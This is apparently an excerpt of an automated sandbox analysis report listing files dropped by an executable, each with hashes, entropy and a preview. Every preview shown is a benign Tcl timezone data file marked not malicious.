                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):336
                                                                                                                                                                                                                              Entropy (8bit):4.614218930153471
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKvhfDm2OHEX3gYoHrXdUvvYbQLpUFdvjSVVFJLNsR/QFckVVFJLLW:MB8623tmdHNYCDWXYbQtUTvjAJBs50vs
                                                                                                                                                                                                                              MD5:248F1B5A26455000C936CE8BC02C1A0B
                                                                                                                                                                                                                              SHA1:0C3F8CD4E038B113E5238AC52652809B6CA27999
                                                                                                                                                                                                                              SHA-256:6D464564ED2EFC9DADA1586D4FC99FE333726D2BE15A00E30C2391F588896463
                                                                                                                                                                                                                              SHA-512:AF36B0B3D410305ED504726C87265ACCAF5577A9B5DD7E7DAF135420E356C651287873197431B65B5317B4BA2009274288E4F101AC1274045A8D99E2414AB132
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kolkata) {.. {-9223372036854775808 21208 0 LMT}.. {-3645237208 21200 0 HMT}.. {-3155694800 19270 0 MMT}.. {-2019705670 19800 0 IST}.. {-891581400 23400 1 +0630}.. {-872058600 19800 0 IST}.. {-862637400 23400 1 +0630}.. {-764145000 19800 0 IST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2062
                                                                                                                                                                                                                              Entropy (8bit):3.7086418466382605
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5Ote2CoXJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnFEw:5B40yVRB7VfXucydm46I/CTxwh
                                                                                                                                                                                                                              MD5:A59F7FFD0C3EBAD47EC5F2B89EBBD9FA
                                                                                                                                                                                                                              SHA1:ACB94E28E0CF7C6606086267CEA1F63A3E755F56
                                                                                                                                                                                                                              SHA-256:53B8D5E7FB1BD67FECE66A933D9BDBB773F14A8C04D316A2A1B00EC6DBC151DD
                                                                                                                                                                                                                              SHA-512:7B3886B9D0A793CCEEDB2B190523922CFEBE5C82A5201C9EFA30CA4C7F63FB75C998CC7E1BD48D5D489F16E36FC0C22BD954CB7D321B3C09B36B60629C4C9F7E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Krasnoyarsk) {.. {-9223372036854775808 22286 0 LMT}.. {-1577513486 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {748983600 25200 0 +07}.. {7
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.956557779400841
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq801c3vXHAIgNtK1tyHRL/2WFK1NFWFKf1z:SlSWB9vsM3yUgHAIgWv6N/2wK1NFwKf9
                                                                                                                                                                                                                              MD5:E70767DA85A7E1FA9395FF0B16CFE5CE
                                                                                                                                                                                                                              SHA1:3F78034F166CFC80B54E56AF289C7700A7E4AA5C
                                                                                                                                                                                                                              SHA-256:056D352DDCFEC155375430FFF3C8743ED5C9B51B866A099E97E12CC381071F50
                                                                                                                                                                                                                              SHA-512:FEDC854FB043AA79F132827F98F8983E480727FAA039CF2FB5B82611E724312A4F3F006EE58707F12B0AA90F5872E17F76E2A040CFB3A90D017C5CF92E52DA0A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Singapore)]} {.. LoadTimeZoneFile Asia/Singapore..}..set TZData(:Asia/Kuala_Lumpur) $TZData(:Asia/Singapore)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):669
                                                                                                                                                                                                                              Entropy (8bit):4.074079100812583
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKPLBDm2OHXoH3UTdMVSSFVM5qGeCiKaFzsBRcerUNwGvULhMXeiCs:MB862HL1mdHXC3UBMxJJo9rphTXUzHHF
                                                                                                                                                                                                                              MD5:489E706324960E86B6E174D913C72E02
                                                                                                                                                                                                                              SHA1:C7D77482C0D41F3426FC269B3B6C0575EF0E8C7E
                                                                                                                                                                                                                              SHA-256:6E35E560675B0B5322474900D4EC8326C504788C1F82E533B09785DEEFF092DF
                                                                                                                                                                                                                              SHA-512:5CEFD44656C041E59A16481E042EA914E7C003BDE6ADF5F49B57052E91F4F732A91A244BD8BC09EF5DC2640D3210DEE53882717C5C4CBD85CCE44A93B028E9C3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kuching) {.. {-9223372036854775808 26480 0 LMT}.. {-1383463280 27000 0 +0730}.. {-1167636600 28800 0 +08}.. {-1082448000 30000 1 +08}.. {-1074586800 28800 0 +08}.. {-1050825600 30000 1 +08}.. {-1042964400 28800 0 +08}.. {-1019289600 30000 1 +08}.. {-1011428400 28800 0 +08}.. {-987753600 30000 1 +08}.. {-979892400 28800 0 +08}.. {-956217600 30000 1 +08}.. {-948356400 28800 0 +08}.. {-924595200 30000 1 +08}.. {-916734000 28800 0 +08}.. {-893059200 30000 1 +08}.. {-885198000 28800 0 +08}.. {-879667200 32400 0 +09}.. {-767005200 28800 0 +08}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):173
                                                                                                                                                                                                                              Entropy (8bit):4.877362838821003
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8t14XHAIgNsM13oOARL/2WFKdQWFK81Fn:SlSWB9vsM3yN14HAIgaM1YOAN/2wKdQ6
                                                                                                                                                                                                                              MD5:EA1DB4B80CC74CBA024B9BF3734B31F2
                                                                                                                                                                                                                              SHA1:D8131C093BCA3B378BEC606CFEB56A40CB4E246F
                                                                                                                                                                                                                              SHA-256:8E0C60A9AA64FB8602EDC35311F7436B04853970A21C1F6C871494A09AAD5787
                                                                                                                                                                                                                              SHA-512:3B57C9CCC16AA4FE71D275D5EC6A7BC1838841023EE4408158362A7E13E7F1B345F7D95006BC8D2FC270158864E286A1A9364C792F679D5803BD82148399C199
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Riyadh)]} {.. LoadTimeZoneFile Asia/Riyadh..}..set TZData(:Asia/Kuwait) $TZData(:Asia/Riyadh)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):169
                                                                                                                                                                                                                              Entropy (8bit):4.781739054385376
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8PWXHAIgNz+NOARL/2WFKf+WFKkvn:SlSWB9vsM3yOHAIg1AN/2wKGwKmn
                                                                                                                                                                                                                              MD5:55DAE27AEAA74FE822338C20B6CDFF68
                                                                                                                                                                                                                              SHA1:F00EB827DC29EB2063B3A0EDBC39856637C55F33
                                                                                                                                                                                                                              SHA-256:4308D741C83B263C7C9FB8EC692A7B7B502135E407B265B12EA7EF92523455C0
                                                                                                                                                                                                                              SHA-512:398EE6015C58BDBBEAB49B74833B938FD84DE1AC6D3B8D095CE772ECA980D9E93F4EBFFFFCEAE7F91E287C8CE4F94B1A078D8E1460C352B7C2018F99915838FF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Macau)]} {.. LoadTimeZoneFile Asia/Macau..}..set TZData(:Asia/Macao) $TZData(:Asia/Macau)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2217
                                                                                                                                                                                                                              Entropy (8bit):3.9638741177777868
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5ReCX8Iv3nhPHCvzncCHg9PHjZzH+0HDHN1aHhHNaezHBjHeHsH65H18HDH983lY:5d8u3hfCTcaOrh6qn151Wf3Bogp+nlC
                                                                                                                                                                                                                              MD5:B184E7403CB7168607D2C9E158F86A3B
                                                                                                                                                                                                                              SHA1:48B003B8F822BE979FBCB08CBDBFFC617BCF99DB
                                                                                                                                                                                                                              SHA-256:FBCB92CECB1CB0BC284ADC30D70C5F57B3AFC992136A0D898ABC64490BB700FB
                                                                                                                                                                                                                              SHA-512:D8C5C67CAEB7C670B7BD1DACC1203C4DEE4DDB16A780F502C4440997CFCFF869E86842EF87C2CD0E0B942941C02A6BC3BDAB7CEAD78B026B68F4A031173400C8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Macau) {.. {-9223372036854775808 27250 0 LMT}.. {-2056692850 28800 0 CST}.. {-884509200 32400 0 +09}.. {-873280800 36000 1 +09}.. {-855918000 32400 0 +09}.. {-841744800 36000 1 +09}.. {-828529200 32400 0 +10}.. {-765363600 28800 0 CT}.. {-747046800 32400 1 CDT}.. {-733827600 28800 0 CST}.. {-716461200 32400 1 CDT}.. {-697021200 28800 0 CST}.. {-683715600 32400 1 CDT}.. {-667990800 28800 0 CST}.. {-654771600 32400 1 CDT}.. {-636627600 28800 0 CST}.. {-623322000 32400 1 CDT}.. {-605178000 28800 0 CST}.. {-591872400 32400 1 CDT}.. {-573642000 28800 0 CST}.. {-559818000 32400 1 CDT}.. {-541674000 28800 0 CST}.. {-528368400 32400 1 CDT}.. {-510224400 28800 0 CST}.. {-498128400 32400 1 CDT}.. {-478774800 28800 0 CST}.. {-466678800 32400 1 CDT}.. {-446720400 28800 0 CST}.. {-435229200 32400 1 CDT}.. {-415258200 28800 0 CST}.. {-403158600
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2088
                                                                                                                                                                                                                              Entropy (8bit):3.7643610103361134
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5he9dbbv+OC+jsuwltZQONEa2Ggf3augO8UoxLyHdX/CX6bW4Bv/7NKx/y:5wv+0j6lua2Gg/3gO8UoOZU2Wc/pKo
                                                                                                                                                                                                                              MD5:F62A89F441C9C17EB99F64223C815651
                                                                                                                                                                                                                              SHA1:408C38A79E056FF9B03D0DA85114DC015CB66938
                                                                                                                                                                                                                              SHA-256:0C6EEEB7975A95C2B0678D137E6A735238D244A37FA11078050051511DE499FE
                                                                                                                                                                                                                              SHA-512:55DC72546BDC26450D5318E9D2819E32A91C27D06A7AF5432BD50F8722C69984BBAA8599055A824D2935D919F0C0AA357687DD9B47F49F213EEE21AF7458FE17
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Magadan) {.. {-9223372036854775808 36192 0 LMT}.. {-1441188192 36000 0 +10}.. {-1247565600 39600 0 +12}.. {354891600 43200 1 +12}.. {370699200 39600 0 +11}.. {386427600 43200 1 +12}.. {402235200 39600 0 +11}.. {417963600 43200 1 +12}.. {433771200 39600 0 +11}.. {449586000 43200 1 +12}.. {465318000 39600 0 +11}.. {481042800 43200 1 +12}.. {496767600 39600 0 +11}.. {512492400 43200 1 +12}.. {528217200 39600 0 +11}.. {543942000 43200 1 +12}.. {559666800 39600 0 +11}.. {575391600 43200 1 +12}.. {591116400 39600 0 +11}.. {606841200 43200 1 +12}.. {622566000 39600 0 +11}.. {638290800 43200 1 +12}.. {654620400 39600 0 +11}.. {670345200 36000 0 +11}.. {670348800 39600 1 +11}.. {686073600 36000 0 +10}.. {695750400 39600 0 +12}.. {701794800 43200 1 +12}.. {717519600 39600 0 +11}.. {733244400 43200 1 +12}.. {748969200 39600 0 +11}.. {76469
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):243
                                                                                                                                                                                                                              Entropy (8bit):4.737440985553183
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wK5XDm2OHUVoHxYQTLQTvj1kc3gEpHkH8vScHr0:MB862hTmdHsCLTI6cQe7HHA
                                                                                                                                                                                                                              MD5:9116C0B70AB33EC49F933EAE0238FD4B
                                                                                                                                                                                                                              SHA1:BA390E8FBEAF5EA6E861AFC5A51CD4DF0B422461
                                                                                                                                                                                                                              SHA-256:30D8AB00E32ECE51442C0310E650D89D6989E0809600EE334CB10C506D84BF9D
                                                                                                                                                                                                                              SHA-512:499E60E8CBDA72226BCB4E241020E62B6F88E7D3E4329D260A6536EF87C02D7D61FD1BECC47D4FF308B4EB5D3E7FFBE2EC1C96FE2DEDC09DD1D973421C5FFE1E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Makassar) {.. {-9223372036854775808 28656 0 LMT}.. {-1577951856 28656 0 MMT}.. {-1172908656 28800 0 +08}.. {-880272000 32400 0 +09}.. {-766054800 28800 0 WITA}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):421
                                                                                                                                                                                                                              Entropy (8bit):4.48495488773916
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862GjmdHnCTZBCvEo6AwoucQzy4orjAbomAtoNv:5GjeCVwvB6AduXzylHAMmAa9
                                                                                                                                                                                                                              MD5:0FBF0ED252638DF31826C33EB3FFBFE2
                                                                                                                                                                                                                              SHA1:3496E4A5251A9BDF3AA4368297140780B6DBF66D
                                                                                                                                                                                                                              SHA-256:070D61A0E39643A700ABA89A8A4BE5733BA456958966098405E11ECDFA854D76
                                                                                                                                                                                                                              SHA-512:2A40E14964B357809E596DF88D8C4141ED78664BACA0A7724A7CA837EF427DC2B07C48D9DBE5787FAB0015673F5BDE002223D489334C5B91B74EEC5507A14B78
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Manila) {.. {-9223372036854775808 -57360 0 LMT}.. {-3944621040 29040 0 LMT}.. {-2229321840 28800 0 PST}.. {-1046678400 32400 1 PDT}.. {-1038733200 28800 0 PST}.. {-873273600 32400 0 JST}.. {-794221200 28800 0 PST}.. {-496224000 32400 1 PDT}.. {-489315600 28800 0 PST}.. {259344000 32400 1 PDT}.. {275151600 28800 0 PST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                              Entropy (8bit):4.805992552335358
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8DeXHAIgN6S7ARL/2WFKvE+H+WFKQ3n:SlSWB9vsM3yj+HAIgMS7AN/2wKLewKQ3
                                                                                                                                                                                                                              MD5:8AEB5C3E81069F884A370714E8013F1F
                                                                                                                                                                                                                              SHA1:4E3DD4A84627E75E84726C0CBA72CA6801280C2B
                                                                                                                                                                                                                              SHA-256:011B7DE1C9F7EC241B224BC864D8AE66ACB433FBC8AD939E4DBEB12BE6390243
                                                                                                                                                                                                                              SHA-512:50B1DE2615AE9B4781505DC709F9D07F6221D4E6D7B61D7BDA682377EAD9807F47FF0E933B79823D0DFD9F3647A82CFC28FB41FBB2226ED1D08B76F86FEB45DC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Dubai)]} {.. LoadTimeZoneFile Asia/Dubai..}..set TZData(:Asia/Muscat) $TZData(:Asia/Dubai)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7625
                                                                                                                                                                                                                              Entropy (8bit):3.7113086720696398
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:R3pv/7V6Aj8aZaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBKb0l:R3v/AauivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:2ADD0DFC1F133E4D044727234251A3DC
                                                                                                                                                                                                                              SHA1:0D1502986258349E384017BA6CB8FA0AC424638C
                                                                                                                                                                                                                              SHA-256:3C3E4844C70D361893EF022D6C3C8E38B243E91D40C5A726C924355476816F25
                                                                                                                                                                                                                              SHA-512:70CDD53E7E44EDABF653A4F92EECBF5BB20A31DA95D65209D1CADE7DD9FC68946B8EC8829C28AE00BE5F42AAB545B9282CBBCFC5834437D6A94A179BF4FE0141
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Nicosia) {.. {-9223372036854775808 8008 0 LMT}.. {-1518920008 7200 0 EET}.. {166572000 10800 1 EEST}.. {182293200 7200 0 EET}.. {200959200 10800 1 EEST}.. {213829200 7200 0 EET}.. {228866400 10800 1 EEST}.. {243982800 7200 0 EET}.. {260316000 10800 1 EEST}.. {276123600 7200 0 EET}.. {291765600 10800 1 EEST}.. {307486800 7200 0 EET}.. {323820000 10800 1 EEST}.. {338936400 7200 0 EET}.. {354664800 10800 1 EEST}.. {370386000 7200 0 EET}.. {386114400 10800 1 EEST}.. {401835600 7200 0 EET}.. {417564000 10800 1 EEST}.. {433285200 7200 0 EET}.. {449013600 10800 1 EEST}.. {465339600 7200 0 EET}.. {481068000 10800 1 EEST}.. {496789200 7200 0 EET}.. {512517600 10800 1 EEST}.. {528238800 7200 0 EET}.. {543967200 10800 1 EEST}.. {559688400 7200 0 EET}.. {575416800 10800 1 EEST}.. {591138000 7200 0 EET}.. {606866400 10800 1 EEST}.. {62258760
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2063
                                                                                                                                                                                                                              Entropy (8bit):3.718004112421892
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:526enddzXJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnFf:5l40yVRB7VfXucydm46I/CTxwf
                                                                                                                                                                                                                              MD5:513B6A2AF76DAED9002C037BEC99862F
                                                                                                                                                                                                                              SHA1:82D1C47BDF46B8B901C35BACACE8595C093BF5F2
                                                                                                                                                                                                                              SHA-256:96A445D47D834C28480D1E2036ECA4962B35AFA494C219065D4879F71C1830DB
                                                                                                                                                                                                                              SHA-512:2FE5AF4FA9D6AAB4FBD8E354789B82D39FA1B52394D3A0ABFBC6A30A531E0B7429A3D9AC7835A2843A6E9859E0255565F151FDFC87004ACB4EBD1AAD40BDA8A4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Novokuznetsk) {.. {-9223372036854775808 20928 0 LMT}.. {-1441259328 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {748983600 25200 0 +07}.. {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2121
                                                                                                                                                                                                                              Entropy (8bit):3.714792994893581
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:52sve20ruXJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnF:5Hc40yVRB7VfXu0TKmtTTDOWQ
                                                                                                                                                                                                                              MD5:AC8C8D768503C8334A9FBAEF4C3A9CAB
                                                                                                                                                                                                                              SHA1:CA10BB99E2D7AB329229759BD4801068A3AEB6D5
                                                                                                                                                                                                                              SHA-256:EF799077291F6B3B19E0AEC88F224BB592FAAD09D30740F2376D3D20F2169639
                                                                                                                                                                                                                              SHA-512:34049B1AC4254F999C3E5AD8CB31ABF88AC2D972E20E19927F33CC59935354F92125A0342A413E64227E8AE29DDFC2FFE5F67AE538C89D8EBAD7FCA889321DFA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Novosibirsk) {.. {-9223372036854775808 19900 0 LMT}.. {-1579476700 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {738090000 25200 0 +07}.. {7
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2055
                                                                                                                                                                                                                              Entropy (8bit):3.6912374223526396
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5abexPvO1FMnFP1FCnFHnFKqenFdDnFQgOnFxjPnFITnFonFJynFAT4TBThSv0FP:5asvjdqxph01NSvPETKmtTTDO0
                                                                                                                                                                                                                              MD5:3E06B20B0B62AA09FA03082FAEE4FD62
                                                                                                                                                                                                                              SHA1:8886EC80528ECA13D3364138BFFE92F881768169
                                                                                                                                                                                                                              SHA-256:2605CD1E26E4AB48BCB4399BB5B17BAD115A47F87BA3DD54B55BB50C3FE82606
                                                                                                                                                                                                                              SHA-512:04C1B6A898D12C8EA1B0B2F6665C870434061C63CC8F7A067BFC708E9828BA2E60104B82E2025E42D51DA2F485890C4D34EC0341EF466A7942649BE64F5EEE17
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Omsk) {.. {-9223372036854775808 17610 0 LMT}.. {-1582088010 18000 0 +05}.. {-1247547600 21600 0 +07}.. {354909600 25200 1 +07}.. {370717200 21600 0 +06}.. {386445600 25200 1 +07}.. {402253200 21600 0 +06}.. {417981600 25200 1 +07}.. {433789200 21600 0 +06}.. {449604000 25200 1 +07}.. {465336000 21600 0 +06}.. {481060800 25200 1 +07}.. {496785600 21600 0 +06}.. {512510400 25200 1 +07}.. {528235200 21600 0 +06}.. {543960000 25200 1 +07}.. {559684800 21600 0 +06}.. {575409600 25200 1 +07}.. {591134400 21600 0 +06}.. {606859200 25200 1 +07}.. {622584000 21600 0 +06}.. {638308800 25200 1 +07}.. {654638400 21600 0 +06}.. {670363200 18000 0 +06}.. {670366800 21600 1 +06}.. {686091600 18000 0 +05}.. {695768400 21600 0 +07}.. {701812800 25200 1 +07}.. {717537600 21600 0 +06}.. {733262400 25200 1 +07}.. {748987200 21600 0 +06}.. {76471200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1664
                                                                                                                                                                                                                              Entropy (8bit):3.708603813141953
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:53PvalvNhQQvmRKqv0fvzQIovWdvEGvDaDv7w9hYwr:JHaBNKs6b03zB0WJEuDa77w9hYA
                                                                                                                                                                                                                              MD5:A3BD0C15642AE4F001F98F8E060E8374
                                                                                                                                                                                                                              SHA1:366F3C7FD4000AC23B79AB0FF4429371ED323B81
                                                                                                                                                                                                                              SHA-256:933BBCD7AE0BF59A5B4A6E0EF74C237FEEDC42E6A3AEB2158131AA70FBA6FE47
                                                                                                                                                                                                                              SHA-512:16D8692D3EA96D3594E6220A6989BBFBB926A66EEBEB240C4DC68BE75C69C5206659D9D341D92AE6128928FD38A5F45B445621CBBBA4E4BA8C34C3AC52BF3C08
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
